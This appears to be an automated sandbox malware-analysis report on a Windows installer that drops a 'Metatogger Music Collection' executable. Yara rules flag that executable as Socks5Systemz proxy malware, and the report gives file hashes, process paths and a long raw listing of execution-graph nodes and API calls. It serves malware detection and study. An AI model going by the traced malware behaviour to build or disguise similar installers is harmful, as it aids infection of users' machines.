                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x400000
                                                                          File size:2'049'145 bytes
                                                                          MD5 hash:F306EA1FAA91611B7BC26E9CC0BD3956
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:1
                                                                          Start time:12:08:49
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x400000
                                                                          File size:693'760 bytes
                                                                          MD5 hash:8E02BC0DF97F95A1DF3FD1EEE341C73F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:12:08:50
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i
                                                                          Imagebase:0x400000
                                                                          File size:1'853'204 bytes
                                                                          MD5 hash:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:12:08:50
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s
                                                                          Imagebase:0x400000
                                                                          File size:1'853'204 bytes
                                                                          MD5 hash:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false


                                                                            Execution Graph

                                                                            Execution Coverage:21.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:2.3%
                                                                            Total number of Nodes:1514
                                                                            Total number of Limit Nodes:21
                                                                            execution_graph: node and edge listing of the report's interactive execution graph (rendered as a diagram in the original; not reproducible in text). Function nodes named in the listing include 409d41, 409984, 402f24, 408f42, 408f44, 402b48, 40294a and 403f4a; API calls recorded on the edges include LocalAlloc, TlsSetValue, TlsGetValue, GetSystemTime, MessageBoxA, LoadStringA, IsDBCSLeadByte, CharPrevA, InterlockedExchange, RaiseException, Wow64RevertWow64FsRedirection and SetLastError.
6234 402674 4 API calls 6232->6234 6233->6228 6233->6232 6234->6231 5884 403a52 5885 403a74 5884->5885 5886 403a5a WriteFile 5884->5886 5886->5885 5887 403a78 GetLastError 5886->5887 5887->5885 5888 402654 5889 403154 4 API calls 5888->5889 5890 402614 5889->5890 5891 402632 5890->5891 5892 403154 4 API calls 5890->5892 5892->5891 5893 408e54 5896 408d20 5893->5896 5897 408d29 5896->5897 5898 403198 4 API calls 5897->5898 5899 408d37 5897->5899 5898->5897 6239 40755a GetFileSize 6240 407586 6239->6240 6241 407576 GetLastError 6239->6241 6241->6240 6242 40757f 6241->6242 6243 4073ec 21 API calls 6242->6243 6243->6240 6244 406f5b 6245 406f68 SetErrorMode 6244->6245 6250 40a161 6251 40a0d3 6250->6251 6252 4093fc 9 API calls 6251->6252 6254 40a0ff 6251->6254 6252->6254 6253 40a118 6255 40a121 73A15CF0 6253->6255 6256 40a12c 6253->6256 6254->6253 6258 40a112 RemoveDirectoryA 6254->6258 6255->6256 6257 40a154 6256->6257 6259 40357c 4 API calls 6256->6259 6258->6253 6260 40a14a 6259->6260 6261 4025ac 4 API calls 6260->6261 6261->6257 5904 402e64 5905 402e69 5904->5905 5906 402e7a RtlUnwind 5905->5906 5907 402e5e 5905->5907 5908 402e9d 5906->5908 6266 40a168 6267 40a19a 6266->6267 6268 40a16f 6266->6268 6270 403198 4 API calls 6267->6270 6276 40936c 6268->6276 6272 40a1d2 6270->6272 6271 40a174 6271->6267 6273 40a192 MessageBoxA 6271->6273 6274 403198 4 API calls 6272->6274 6273->6267 6275 40a1da 6274->6275 6277 4093d3 ExitWindowsEx 6276->6277 6278 409378 GetCurrentProcess OpenProcessToken 6276->6278 6280 40938a 6277->6280 6279 40938e LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6278->6279 6278->6280 6279->6277 6279->6280 6280->6271 5676 406f77 5677 406f68 SetErrorMode 5676->5677 6293 403f7d 6294 403fa2 6293->6294 6297 403f84 6293->6297 6296 403e8e 4 API calls 6294->6296 6294->6297 6295 403f8c 6296->6297 6297->6295 6298 402674 4 API calls 6297->6298 6299 403fca 6298->6299 6300 403d02 6305 403d12 6300->6305 6301 403ddf ExitProcess 6302 403db8 6303 403cc8 4 API 
calls 6302->6303 6306 403dc2 6303->6306 6304 403dea 6305->6301 6305->6302 6305->6304 6310 403da4 6305->6310 6311 403d8f MessageBoxA 6305->6311 6307 403cc8 4 API calls 6306->6307 6308 403dcc 6307->6308 6320 4019dc 6308->6320 6316 403fe4 6310->6316 6311->6302 6312 403dd1 6312->6301 6312->6304 6317 403fe8 6316->6317 6318 403f07 4 API calls 6317->6318 6319 404006 6318->6319 6321 401abb 6320->6321 6322 4019ed 6320->6322 6321->6312 6323 401a04 RtlEnterCriticalSection 6322->6323 6324 401a0e LocalFree 6322->6324 6323->6324 6325 401a41 6324->6325 6326 401a2f VirtualFree 6325->6326 6327 401a49 6325->6327 6326->6325 6328 401a70 LocalFree 6327->6328 6329 401a87 6327->6329 6328->6328 6328->6329 6330 401aa9 RtlDeleteCriticalSection 6329->6330 6331 401a9f RtlLeaveCriticalSection 6329->6331 6330->6312 6331->6330 5917 404206 5918 4041cc 5917->5918 5921 40420a 5917->5921 5919 404282 5920 403154 4 API calls 5922 404323 5920->5922 5921->5919 5921->5920 5923 402c08 5924 402c82 5923->5924 5927 402c19 5923->5927 5925 402c56 RtlUnwind 5926 403154 4 API calls 5925->5926 5926->5924 5927->5924 5927->5925 5930 402b28 5927->5930 5931 402b31 RaiseException 5930->5931 5932 402b47 5930->5932 5931->5932 5932->5925 6342 409f0b 6343 409984 4 API calls 6342->6343 6344 409f10 6343->6344 6345 409f15 6344->6345 6346 402f24 5 API calls 6344->6346 6347 407878 InterlockedExchange 6345->6347 6346->6345 6348 409f3f 6347->6348 6349 409f4f 6348->6349 6350 409984 4 API calls 6348->6350 6351 40760c 22 API calls 6349->6351 6350->6349 6352 409f6b 6351->6352 6353 4025ac 4 API calls 6352->6353 6354 409fa2 6353->6354 5864 40760c SetEndOfFile 5865 407623 5864->5865 5866 40761c 5864->5866 5867 4073ec 21 API calls 5866->5867 5867->5865 5933 403018 5934 403025 5933->5934 5938 403070 5933->5938 5935 40302a RtlUnwind 5934->5935 5936 40304e 5935->5936 5939 402f78 5936->5939 5940 402be8 5936->5940 5941 402bf1 RaiseException 5940->5941 5942 402c04 5940->5942 5941->5942 5942->5938 5947 407c23 5950 407c29 5947->5950 5948 40322c 
4 API calls 5949 407cc1 5948->5949 5951 4032fc 4 API calls 5949->5951 5950->5948 5952 407ccb 5951->5952 5953 4057e0 4 API calls 5952->5953 5954 407cda 5953->5954 5955 403198 4 API calls 5954->5955 5956 407cf4 5955->5956 5184 407524 SetFilePointer 5185 407557 5184->5185 5186 407547 GetLastError 5184->5186 5186->5185 5187 407550 5186->5187 5189 4073ec GetLastError 5187->5189 5192 40734c 5189->5192 5201 4071e4 FormatMessageA 5192->5201 5195 407394 5197 4057e0 4 API calls 5195->5197 5198 4073a3 5197->5198 5208 403198 5198->5208 5202 40720a 5201->5202 5212 403278 5202->5212 5205 4050e4 5217 4050f8 5205->5217 5209 4031b7 5208->5209 5210 40319e 5208->5210 5209->5185 5210->5209 5211 4025ac 4 API calls 5210->5211 5211->5209 5213 403254 4 API calls 5212->5213 5214 403288 5213->5214 5215 403198 4 API calls 5214->5215 5216 4032a0 5215->5216 5216->5195 5216->5205 5218 405115 5217->5218 5225 404da8 5218->5225 5221 405141 5223 403278 4 API calls 5221->5223 5224 4050f3 5223->5224 5224->5195 5228 404dc3 5225->5228 5226 404dd5 5226->5221 5230 404b34 5226->5230 5228->5226 5233 404eca 5228->5233 5240 404d9c 5228->5240 5331 405890 5230->5331 5232 404b45 5232->5221 5234 404edb 5233->5234 5236 404f29 5233->5236 5234->5236 5237 404faf 5234->5237 5239 404f47 5236->5239 5243 404d44 5236->5243 5237->5239 5247 404d88 5237->5247 5239->5228 5241 403198 4 API calls 5240->5241 5242 404da6 5241->5242 5242->5228 5244 404d52 5243->5244 5250 404b4c 5244->5250 5246 404d80 5246->5236 5270 4039a4 5247->5270 5253 405900 5250->5253 5252 404b65 5252->5246 5254 40590e 5253->5254 5263 404c2c LoadStringA 5254->5263 5257 4050e4 19 API calls 5258 405946 5257->5258 5259 4031e8 4 API calls 5258->5259 5260 405951 5259->5260 5266 4031b8 5260->5266 5264 403278 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5263->5264 5265 404c59 5264->5265 5265->5257 5268 4031be 5266->5268 5267 4031e3 5267->5252 5268->5267 5269 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5268->5269 5269->5268 5271 4039ab 5270->5271 5276 
4038b4 5271->5276 5273 4039cb 5274 403198 4 API calls 5273->5274 5275 4039d2 5274->5275 5275->5239 5277 4038d5 5276->5277 5278 4038c8 5276->5278 5280 403934 5277->5280 5281 4038db 5277->5281 5304 403780 5278->5304 5282 403993 5280->5282 5283 40393b 5280->5283 5285 4038e1 5281->5285 5286 4038ee 5281->5286 5288 4037f4 3 API calls 5282->5288 5289 403941 5283->5289 5290 40394b 5283->5290 5284 4038d0 5284->5273 5311 403894 5285->5311 5287 403894 6 API calls 5286->5287 5292 4038fc 5287->5292 5288->5284 5326 403864 5289->5326 5294 4037f4 3 API calls 5290->5294 5316 4037f4 5292->5316 5295 40395d 5294->5295 5297 403864 9 API calls 5295->5297 5299 403976 5297->5299 5298 403917 5322 40374c 5298->5322 5301 40374c VariantClear 5299->5301 5303 40398b 5301->5303 5302 40392c 5302->5273 5303->5273 5305 4037f0 5304->5305 5306 403744 5304->5306 5305->5284 5306->5304 5307 403793 VariantClear 5306->5307 5308 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5306->5308 5309 4037dc VariantCopyInd 5306->5309 5310 4037ab 5306->5310 5307->5306 5308->5306 5309->5305 5309->5306 5310->5284 5312 4036b8 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5311->5312 5313 4038a0 5312->5313 5314 40374c VariantClear 5313->5314 5315 4038a9 5314->5315 5315->5284 5317 403845 VariantChangeTypeEx 5316->5317 5318 40380a VariantChangeTypeEx 5316->5318 5321 403832 5317->5321 5319 403826 5318->5319 5320 40374c VariantClear 5319->5320 5320->5321 5321->5298 5323 403766 5322->5323 5324 403759 5322->5324 5323->5302 5324->5323 5325 403779 VariantClear 5324->5325 5325->5302 5327 40369c 8 API calls 5326->5327 5328 40387b 5327->5328 5329 40374c VariantClear 5328->5329 5330 403882 5329->5330 5330->5284 5332 40589c 5331->5332 5333 404c2c 5 API calls 5332->5333 5334 4058c2 5333->5334 5335 4031e8 4 API calls 5334->5335 5336 4058cd 5335->5336 5337 403198 4 API calls 5336->5337 5338 4058e2 5337->5338 5338->5232 5339 409b24 5378 4030dc 5339->5378 5341 409b3a 5381 4042e8 
5341->5381 5343 409b3f 5384 406518 5343->5384 5347 409b49 5394 408fc8 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5347->5394 5356 4031e8 4 API calls 5357 409b95 5356->5357 5430 407440 5357->5430 5362 409984 4 API calls 5364 409c22 5362->5364 5450 407400 5364->5450 5366 409be4 5366->5362 5366->5364 5367 409c63 5454 40794c 5367->5454 5368 409c48 5368->5367 5369 409984 4 API calls 5368->5369 5369->5367 5371 409c88 5464 408a2c 5371->5464 5375 408a2c 23 API calls 5377 409cce 5375->5377 5376 409d07 5377->5375 5377->5376 5486 403094 5378->5486 5380 4030e1 GetModuleHandleA GetCommandLineA 5380->5341 5382 403154 4 API calls 5381->5382 5383 404323 5381->5383 5382->5383 5383->5343 5487 405bf8 5384->5487 5393 406564 6F561CD0 5393->5347 5395 40901b 5394->5395 5577 406f00 SetErrorMode 5395->5577 5398 4071e4 5 API calls 5399 40904b 5398->5399 5400 403198 4 API calls 5399->5400 5401 409060 5400->5401 5402 409a14 GetSystemInfo VirtualQuery 5401->5402 5403 409ac8 5402->5403 5406 409a3e 5402->5406 5408 409580 5403->5408 5404 409aa9 VirtualQuery 5404->5403 5404->5406 5405 409a68 VirtualProtect 5405->5406 5406->5403 5406->5404 5406->5405 5407 409a97 VirtualProtect 5406->5407 5407->5404 5583 406b30 GetCommandLineA 5408->5583 5410 40963d 5412 4031b8 4 API calls 5410->5412 5411 406b8c 6 API calls 5415 40959d 5411->5415 5413 409657 5412->5413 5416 406b8c 5413->5416 5414 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5414->5415 5415->5410 5415->5411 5415->5414 5417 406bb3 GetModuleFileNameA 5416->5417 5418 406bd7 GetCommandLineA 5416->5418 5419 403278 4 API calls 5417->5419 5422 406bdc 5418->5422 5420 406bd5 5419->5420 5424 406c04 5420->5424 5421 406be1 5425 403198 4 API calls 5421->5425 5422->5421 5423 406a50 4 API calls 5422->5423 5426 406be9 5422->5426 5423->5422 5427 403198 4 API calls 5424->5427 5425->5426 5428 40322c 4 API calls 5426->5428 5429 406c19 5427->5429 5428->5424 5429->5356 5431 40744a 5430->5431 5604 4074d6 5431->5604 5607 4074d8 5431->5607 5432 
407476 5433 40748a 5432->5433 5434 4073ec 21 API calls 5432->5434 5437 409ad0 FindResourceA 5433->5437 5434->5433 5438 409ae5 5437->5438 5439 409aea SizeofResource 5437->5439 5440 409984 4 API calls 5438->5440 5441 409af7 5439->5441 5442 409afc LoadResource 5439->5442 5440->5439 5443 409984 4 API calls 5441->5443 5444 409b0a 5442->5444 5445 409b0f LockResource 5442->5445 5443->5442 5446 409984 4 API calls 5444->5446 5447 409b20 5445->5447 5448 409b1b 5445->5448 5446->5445 5447->5366 5480 407878 5447->5480 5449 409984 4 API calls 5448->5449 5449->5447 5451 407414 5450->5451 5452 407424 5451->5452 5453 40734c 20 API calls 5451->5453 5452->5368 5453->5452 5455 407959 5454->5455 5456 4057e0 4 API calls 5455->5456 5457 4079ad 5455->5457 5456->5457 5458 407878 InterlockedExchange 5457->5458 5459 4079bf 5458->5459 5460 4057e0 4 API calls 5459->5460 5461 4079d5 5459->5461 5460->5461 5462 407a18 5461->5462 5463 4057e0 4 API calls 5461->5463 5462->5371 5463->5462 5468 408a5d 5464->5468 5479 408aa6 5464->5479 5465 408af1 5619 407bdc 5465->5619 5466 407bdc 23 API calls 5466->5468 5467 407bdc 23 API calls 5467->5479 5468->5466 5475 403420 4 API calls 5468->5475 5476 4031e8 4 API calls 5468->5476 5468->5479 5610 4034f0 5468->5610 5471 408b08 5473 4031b8 4 API calls 5471->5473 5472 4034f0 4 API calls 5472->5479 5474 408b22 5473->5474 5483 404b70 5474->5483 5475->5468 5476->5468 5477 403420 4 API calls 5477->5479 5478 4031e8 4 API calls 5478->5479 5479->5465 5479->5467 5479->5472 5479->5477 5479->5478 5672 407824 5480->5672 5484 402594 4 API calls 5483->5484 5485 404b7b 5484->5485 5485->5377 5486->5380 5488 405890 5 API calls 5487->5488 5489 405c09 5488->5489 5490 4051d0 GetSystemDefaultLCID 5489->5490 5493 405206 5490->5493 5491 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5491->5493 5492 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5492->5493 5493->5491 5493->5492 5494 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5493->5494 
5498 405268 5493->5498 5494->5493 5495 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5495->5498 5496 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5496->5498 5497 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5497->5498 5498->5495 5498->5496 5498->5497 5499 4052eb 5498->5499 5500 4031b8 4 API calls 5499->5500 5501 405305 5500->5501 5502 405314 GetSystemDefaultLCID 5501->5502 5559 40515c GetLocaleInfoA 5502->5559 5505 4031e8 4 API calls 5506 405354 5505->5506 5507 40515c 5 API calls 5506->5507 5508 405369 5507->5508 5509 40515c 5 API calls 5508->5509 5510 40538d 5509->5510 5565 4051a8 GetLocaleInfoA 5510->5565 5513 4051a8 GetLocaleInfoA 5514 4053bd 5513->5514 5515 40515c 5 API calls 5514->5515 5516 4053d7 5515->5516 5517 4051a8 GetLocaleInfoA 5516->5517 5518 4053f4 5517->5518 5519 40515c 5 API calls 5518->5519 5520 40540e 5519->5520 5521 4031e8 4 API calls 5520->5521 5522 40541b 5521->5522 5523 40515c 5 API calls 5522->5523 5524 405430 5523->5524 5525 4031e8 4 API calls 5524->5525 5526 40543d 5525->5526 5527 4051a8 GetLocaleInfoA 5526->5527 5528 40544b 5527->5528 5529 40515c 5 API calls 5528->5529 5530 405465 5529->5530 5531 4031e8 4 API calls 5530->5531 5532 405472 5531->5532 5533 40515c 5 API calls 5532->5533 5534 405487 5533->5534 5535 4031e8 4 API calls 5534->5535 5536 405494 5535->5536 5537 40515c 5 API calls 5536->5537 5538 4054a9 5537->5538 5539 4054c6 5538->5539 5540 4054b7 5538->5540 5542 40322c 4 API calls 5539->5542 5573 40322c 5540->5573 5543 4054c4 5542->5543 5544 40515c 5 API calls 5543->5544 5545 4054e8 5544->5545 5546 405505 5545->5546 5547 4054f6 5545->5547 5549 403198 4 API calls 5546->5549 5548 40322c 4 API calls 5547->5548 5550 405503 5548->5550 5549->5550 5567 4033b4 5550->5567 5552 405527 5553 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5552->5553 5554 405541 5553->5554 5555 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5554->5555 5556 40555b 5555->5556 5557 405c44 
GetVersionExA 5556->5557 5558 405c5b 5557->5558 5558->5393 5560 405183 5559->5560 5561 405195 5559->5561 5563 403278 4 API calls 5560->5563 5562 40322c 4 API calls 5561->5562 5564 405193 5562->5564 5563->5564 5564->5505 5566 4051c4 5565->5566 5566->5513 5568 4033bc 5567->5568 5569 403254 4 API calls 5568->5569 5570 4033cf 5569->5570 5571 4031e8 4 API calls 5570->5571 5572 4033f7 5571->5572 5575 403230 5573->5575 5574 403252 5574->5543 5575->5574 5576 4025ac 4 API calls 5575->5576 5576->5574 5581 403414 5577->5581 5580 406f4e 5580->5398 5582 403418 LoadLibraryA 5581->5582 5582->5580 5590 406a50 5583->5590 5585 406b53 5586 406b65 5585->5586 5587 406a50 4 API calls 5585->5587 5588 403198 4 API calls 5586->5588 5587->5585 5589 406b7a 5588->5589 5589->5415 5591 406a7c 5590->5591 5592 403278 4 API calls 5591->5592 5593 406a89 5592->5593 5600 403420 5593->5600 5595 406a91 5596 4031e8 4 API calls 5595->5596 5597 406aa9 5596->5597 5598 403198 4 API calls 5597->5598 5599 406acb 5598->5599 5599->5585 5601 403426 5600->5601 5603 403437 5600->5603 5602 403254 4 API calls 5601->5602 5601->5603 5602->5603 5603->5595 5605 4074d8 5604->5605 5606 407517 CreateFileA 5605->5606 5606->5432 5608 403414 5607->5608 5609 407517 CreateFileA 5608->5609 5609->5432 5611 4034fd 5610->5611 5618 40352d 5610->5618 5613 403526 5611->5613 5615 403509 5611->5615 5612 403198 4 API calls 5614 403517 5612->5614 5616 403254 4 API calls 5613->5616 5614->5468 5627 4025c4 5615->5627 5616->5618 5618->5612 5620 407bf7 5619->5620 5621 407bec 5619->5621 5642 407b80 5620->5642 5631 407dfc 5621->5631 5623 407bf5 5623->5471 5625 4057e0 4 API calls 5625->5623 5628 4025ca 5627->5628 5629 4025dc 5628->5629 5630 403154 4 API calls 5628->5630 5629->5614 5630->5629 5632 407e11 5631->5632 5634 407e20 5632->5634 5649 407d14 5632->5649 5635 407e5a 5634->5635 5637 407d14 19 API calls 5634->5637 5636 407e6e 5635->5636 5638 407d14 19 API calls 5635->5638 5641 407e9a 5636->5641 5646 407da4 5636->5646 5637->5635 5638->5636 
5641->5623 5643 407bd3 5642->5643 5644 407b94 5642->5644 5643->5623 5643->5625 5644->5643 5660 407ad0 5644->5660 5647 407db3 VirtualFree 5646->5647 5648 407dc5 VirtualAlloc 5646->5648 5647->5648 5648->5641 5652 405814 5649->5652 5651 407d36 5651->5634 5653 405820 5652->5653 5654 4050e4 19 API calls 5653->5654 5655 40584d 5654->5655 5656 4031e8 4 API calls 5655->5656 5657 405858 5656->5657 5658 403198 4 API calls 5657->5658 5659 40586d 5658->5659 5659->5651 5661 407aec 5660->5661 5662 407adb 5660->5662 5664 407400 20 API calls 5661->5664 5663 4057e0 4 API calls 5662->5663 5663->5661 5665 407b00 5664->5665 5666 407400 20 API calls 5665->5666 5667 407b21 5666->5667 5668 407878 InterlockedExchange 5667->5668 5669 407b36 5668->5669 5670 407b4c 5669->5670 5671 4057e0 4 API calls 5669->5671 5670->5644 5671->5670 5673 407836 5672->5673 5674 407847 5672->5674 5675 40783b InterlockedExchange 5673->5675 5674->5366 5675->5674 5957 405a24 5958 405a34 5957->5958 5959 405a2c 5957->5959 5960 405a32 5959->5960 5961 405a3b 5959->5961 5964 40599c 5960->5964 5962 405890 5 API calls 5961->5962 5962->5958 5965 4059a4 5964->5965 5966 4059be 5965->5966 5969 403154 4 API calls 5965->5969 5967 4059c3 5966->5967 5968 4059da 5966->5968 5970 405890 5 API calls 5967->5970 5971 403154 4 API calls 5968->5971 5969->5965 5973 4059d6 5970->5973 5972 4059df 5971->5972 5974 405900 19 API calls 5972->5974 5975 403154 4 API calls 5973->5975 5974->5973 5976 405a08 5975->5976 5977 403154 4 API calls 5976->5977 5978 405a16 5977->5978 5978->5958 6363 409d26 6364 409d4b 6363->6364 6415 4096e8 6364->6415 6366 409da3 6443 4026c4 GetSystemTime 6366->6443 6368 409da8 6397 409254 6368->6397 6369 409d50 6369->6366 6436 408cfc 6369->6436 6373 409d7f 6376 409d87 MessageBoxA 6373->6376 6374 4031e8 4 API calls 6375 409dbd 6374->6375 6444 406888 6375->6444 6376->6366 6378 409d94 6376->6378 6439 4057b4 6378->6439 6384 409deb 6471 403340 6384->6471 6386 409df9 6387 4031e8 4 API calls 6386->6387 6388 409e09 6387->6388 
6389 407440 23 API calls 6388->6389 6390 409e48 6389->6390 6391 402594 4 API calls 6390->6391 6392 409e68 6391->6392 6393 40794c 5 API calls 6392->6393 6394 409eaa 6393->6394 6395 407bdc 23 API calls 6394->6395 6396 409ed1 6395->6396 6406 409274 6397->6406 6400 409299 CreateDirectoryA 6401 409311 6400->6401 6402 4092a3 GetLastError 6400->6402 6403 40322c 4 API calls 6401->6403 6402->6406 6405 40931b 6403->6405 6404 408cfc 4 API calls 6404->6406 6407 4031b8 4 API calls 6405->6407 6406->6400 6406->6404 6408 404be4 19 API calls 6406->6408 6411 4071e4 5 API calls 6406->6411 6413 408ccc 4 API calls 6406->6413 6414 4057e0 4 API calls 6406->6414 6486 406c54 6406->6486 6509 409148 6406->6509 6409 409335 6407->6409 6408->6406 6410 4031b8 4 API calls 6409->6410 6412 409342 6410->6412 6411->6406 6412->6374 6413->6406 6414->6406 6416 409731 6415->6416 6422 4096f5 6415->6422 6417 40973a 6416->6417 6418 40973e 6416->6418 6419 409747 GetUserDefaultLangID 6417->6419 6428 40973c 6417->6428 6615 406f84 GetModuleHandleA GetProcAddress 6418->6615 6419->6428 6422->6416 6425 409721 6422->6425 6423 4097ef 6424 40969c 5 API calls 6423->6424 6426 409728 6424->6426 6427 40969c 5 API calls 6425->6427 6426->6369 6427->6426 6428->6423 6429 409791 6428->6429 6430 409787 GetACP 6428->6430 6431 40979e 6428->6431 6432 40969c 5 API calls 6429->6432 6430->6428 6430->6429 6431->6423 6433 4097e2 6431->6433 6434 4097d8 GetACP 6431->6434 6432->6426 6435 40969c 5 API calls 6433->6435 6434->6431 6434->6433 6435->6426 6437 408ccc 4 API calls 6436->6437 6438 408d18 6437->6438 6438->6373 6440 4057b9 6439->6440 6441 405890 5 API calls 6440->6441 6442 4057cb 6441->6442 6442->6442 6443->6368 6659 406780 6444->6659 6447 403454 4 API calls 6448 4068aa 6447->6448 6449 406620 6448->6449 6664 406844 6449->6664 6452 406650 6454 403340 4 API calls 6452->6454 6453 40665e 6455 403454 4 API calls 6453->6455 6456 40665c 6454->6456 6457 406671 6455->6457 6459 403198 4 API calls 6456->6459 6458 403340 4 API calls 6457->6458 
6458->6456 6460 406693 6459->6460 6461 406598 6460->6461 6462 4065a2 6461->6462 6463 4065c5 6461->6463 6670 4068b0 6462->6670 6464 40322c 4 API calls 6463->6464 6466 4065ce 6464->6466 6466->6384 6467 4065a9 6467->6463 6468 4065b4 6467->6468 6469 403340 4 API calls 6468->6469 6470 4065c2 6469->6470 6470->6384 6472 403344 6471->6472 6473 4033a5 6471->6473 6474 4031e8 6472->6474 6475 40334c 6472->6475 6477 4031fc 6474->6477 6480 403254 4 API calls 6474->6480 6475->6473 6476 40335b 6475->6476 6479 4031e8 4 API calls 6475->6479 6481 403254 4 API calls 6476->6481 6478 403228 6477->6478 6482 4025ac 4 API calls 6477->6482 6478->6386 6479->6476 6480->6477 6483 403375 6481->6483 6482->6478 6484 4031e8 4 API calls 6483->6484 6485 4033a1 6484->6485 6485->6386 6528 4069b8 6486->6528 6489 406c86 6491 4069b8 5 API calls 6489->6491 6493 406cd2 6489->6493 6492 406c96 6491->6492 6494 406ca2 6492->6494 6496 406994 7 API calls 6492->6496 6536 4067e8 6493->6536 6494->6493 6497 406cc7 6494->6497 6500 4069b8 5 API calls 6494->6500 6496->6494 6497->6493 6548 406c28 GetWindowsDirectoryA 6497->6548 6502 406cbb 6500->6502 6501 406598 5 API calls 6503 406ce7 6501->6503 6502->6497 6504 406994 7 API calls 6502->6504 6505 40322c 4 API calls 6503->6505 6504->6497 6506 406cf1 6505->6506 6507 4031b8 4 API calls 6506->6507 6508 406d0b 6507->6508 6508->6406 6510 409168 6509->6510 6511 406598 5 API calls 6510->6511 6512 409181 6511->6512 6513 40322c 4 API calls 6512->6513 6516 40918c 6513->6516 6514 4068d8 6 API calls 6514->6516 6516->6514 6517 408cfc 4 API calls 6516->6517 6518 4033b4 4 API calls 6516->6518 6519 4057e0 4 API calls 6516->6519 6521 409208 6516->6521 6588 4090d4 6516->6588 6596 408f58 6516->6596 6517->6516 6518->6516 6519->6516 6522 40322c 4 API calls 6521->6522 6523 409213 6522->6523 6524 4031b8 4 API calls 6523->6524 6525 40922d 6524->6525 6526 403198 4 API calls 6525->6526 6527 409235 6526->6527 6527->6406 6529 4034f0 4 API calls 6528->6529 6530 4069cb 6529->6530 6531 4069e2 
GetEnvironmentVariableA 6530->6531 6535 4069f5 6530->6535 6550 406d4c 6530->6550 6531->6530 6532 4069ee 6531->6532 6534 403198 4 API calls 6532->6534 6534->6535 6535->6489 6545 406994 6535->6545 6537 403414 6536->6537 6538 40680b GetFullPathNameA 6537->6538 6539 406817 6538->6539 6540 40682e 6538->6540 6539->6540 6541 40681f 6539->6541 6542 40322c 4 API calls 6540->6542 6543 403278 4 API calls 6541->6543 6544 40682c 6542->6544 6543->6544 6544->6501 6554 40693c 6545->6554 6549 406c49 6548->6549 6549->6493 6551 406d5a 6550->6551 6552 4034f0 4 API calls 6551->6552 6553 406d68 6552->6553 6553->6530 6561 4068d8 6554->6561 6556 40695e 6557 406966 GetFileAttributesA 6556->6557 6558 40697b 6557->6558 6559 403198 4 API calls 6558->6559 6560 406983 6559->6560 6560->6489 6571 4066a4 6561->6571 6563 4068e9 6565 406910 6563->6565 6578 4068d0 CharPrevA 6563->6578 6566 406926 6565->6566 6567 40691b 6565->6567 6579 403454 6566->6579 6568 40322c 4 API calls 6567->6568 6570 406924 6568->6570 6570->6556 6574 4066b5 6571->6574 6572 406719 6573 4065e0 IsDBCSLeadByte 6572->6573 6575 406714 6572->6575 6573->6575 6574->6572 6577 4066d3 6574->6577 6575->6563 6577->6575 6586 4065e0 IsDBCSLeadByte 6577->6586 6578->6563 6580 403486 6579->6580 6581 403459 6579->6581 6582 403198 4 API calls 6580->6582 6581->6580 6584 40346d 6581->6584 6583 40347c 6582->6583 6583->6570 6585 403278 4 API calls 6584->6585 6585->6583 6587 4065f4 6586->6587 6587->6577 6589 403198 4 API calls 6588->6589 6591 4090f5 6589->6591 6593 409122 6591->6593 6605 4032a8 6591->6605 6608 403494 6591->6608 6594 403198 4 API calls 6593->6594 6595 409137 6594->6595 6595->6516 6597 408e94 2 API calls 6596->6597 6598 408f6e 6597->6598 6599 408f72 6598->6599 6612 4069a8 6598->6612 